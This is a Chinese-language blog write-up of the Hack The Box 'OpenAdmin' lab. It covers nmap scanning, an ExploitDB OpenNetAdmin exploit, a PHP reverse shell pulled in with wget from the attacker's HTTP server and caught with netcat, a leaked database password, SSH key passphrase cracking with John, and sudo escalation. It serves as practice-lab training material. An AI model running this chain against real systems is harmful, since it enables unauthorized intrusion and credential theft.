Open in app

Sign in

Write

Sign in

Hack the box — OpenAdmin write up

Kuro Huang
資安工作者的學習之路
Published in
8 min readAug 1, 2020

Hack the box — OpenAdmin解題分享

這篇寫於2020年初時候,但拖到現在才發。

OpenAdmin

Hack The Box :: Penetration Testing Labs

Login to the Hack The Box platform and take your pen-testing and cyber security skills to the next level!

www.hackthebox.eu

Openadmin
Ratings

探查

執行Nmap

nmap -sT -sV -T4 -p- -oA 10.10.10.171 10.10.10.171

發現有tcp 80 開瀏覽器看看

確定有網頁 那我們使用dirb爆破目錄

因為爆破要時間 順便做點其他事情

回到剛剛網站 點選Login:

找一下這個OpenNetAdmin套件的弱點資訊,使用Kali內建的

Searchsploit [名稱]

因為我一開始找不到 去Google後有發現弱點

所以回到Kali先更新一下Kali的Searchsploit 內容

再搜尋一次

去ExploitDB也有

從exploitDB將檔案下載回來執行看看

執行失敗 覺得這檔案有問題 上網查了一下需要修改一些程式碼

Run sed -i 's/\r$//' 47691.sh

利用漏洞 — 上傳木馬

接下來需要上傳PHP木馬

PHP Reserve 流程:

  1. php-reverse-shell更改成自己Kali IP
  2. 新視窗-> python3 -m http.server 80 (phpreserve 檔案放的目錄下執行)
  3. 在目標的視窗上執行 wget http://自己IP/php-reverse-shell.php
  4. 新視窗執行nc -v -n -l -p [自己訂的Port]
  5. 開瀏覽器執行 http://openadmin/ona/php-reverse-shell.php

先在視窗執行指令看看

先在本機建立http server

PHP Reverse Shell 檔案可以去Pentest monkey

php-reverse-shell

This tool is designed for those situations during a pentest where you have upload access to a webserver that's running…

pentestmonkey.net

下載後設定參數,將IP資訊與Port改一下

使用wget

Linux系統中的wget是一個下載檔案的工具,我們在從上述步驟登入後系統上執行wget 將檔案拋上去,並在本機瀏覽器執行檔案

以下圖為例 在靶機shell視窗上執行指令後

wget http://10.10.14.11/p-reverse-shell.php

回到瀏覽器上執行

http://10.10.10.171/ona/p-reverse-shell.php

同時於本機端使用nc指令來接收拋回來的資訊( Netcat)

nc 指令參考如下:

nc 參考資訊

使用id與ls確認一下目前權限與目錄有什麼檔案

經過一番搜尋,在下面路徑找到關鍵檔案

/opt/ona/www/local/config/database_settings.inc.php

Cat檔案後發現一組好像可以用的密碼:

n1nj4W4rri0R!

發現後 回來ssh嘗試登入Jimmy

成功後我們發現了另一個使用者(joanna) 但登入不進去

在jimmy下面路徑做搜尋一番發現了幾項訊息

<h3>Don’t forget your “ninja” password</h3>

(‘cat /home/joanna/.ssh/id_rsa’);

發現ninja

ninja不足以讓我們登入Joanna的帳號(登入失敗)

發現Apache的資料夾 找了一下Apache相關檔案 發現以下訊息:

127.0.0.1:52846

讓我們用Curl執行看看( CURL是Linux系統一個實用的工具指令, c指crawl, 意指把網頁抓下來, 故名思義這個指令就是把所指定的網頁內容抓下來進行分析剖析 可參考這裡)

我們拿到了一組ssh Key

接下來就拿這組Key登入看看並輸入之前看到的密碼: ninja

Fail,我們必須換個方式

提權 Crack password

試著爆破一下,使用John這個工具

教學可以參考以下網站

https://www.hackingarticles.in/beginners-guide-for-john-the-ripper-part-2/

第一步需要先轉換格式 使用檔案:

ssh2john.py

第二步 轉換後將檔案爆破 需要字典檔

python /usr/share/john/ssh2john.py ssh.txt > ssh_john

John

發現了 bloodninjas

注意:

第二步如果沒有使用過rock you這個字典檔案 我們需要先解壓縮 路徑如下:

cd /usr/share/wordlists

回到登入joanna

ssh -i ssh.txt joanna@10.10.10.171

登入時候如果跳出權限不足可以執行檔案提權:

chmod

Warning

登入joanna後 執行ls看一下

很明顯就是user.txt 之後Cat

拿到user的Flag !

拿Root

先看一下我們sudo的權限為何(sudo有提權漏洞)

輸入 CTR+ R(讀取檔案)後直接猜路徑

/root/root.txt

執行^X (Ctrl+X)

拿到Flag

若您喜歡我的文章,歡迎按下「拍手」與Liker按讚給我支持並轉發給你的朋友們(可以多拍幾下手喔),或是「Follow」我,讓我提供文章給您。

也歡迎繼續閱讀:
讀書心得系列
https://medium.com/blacksecurity/tagged/reading
投資理財系列
https://medium.com/blacksecurity/tagged/finance
CTF
https://medium.com/blacksecurity/tagged/ctf
網路管理
https://medium.com/blacksecurity/tagged/network
Htb
Ctf
Pentesting
Writeup

--

--

Kuro Huang
資安工作者的學習之路

Written by Kuro Huang

1.1K Followers
Editor for

對教育充滿期待的資安從業者,現任ISC2台北分會理監事會成員,喜歡用專業興趣交朋友建立友誼。曾擔任資安管理師與四大會計師事務所資安顧問,希望對資安社群盡一點心力,並期望自己與身旁的人能有所進步,歡迎喝咖啡聊資安。希望保持著定期參與資安社群活動。個人介紹網站https://portaly.cc/kurohuang

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams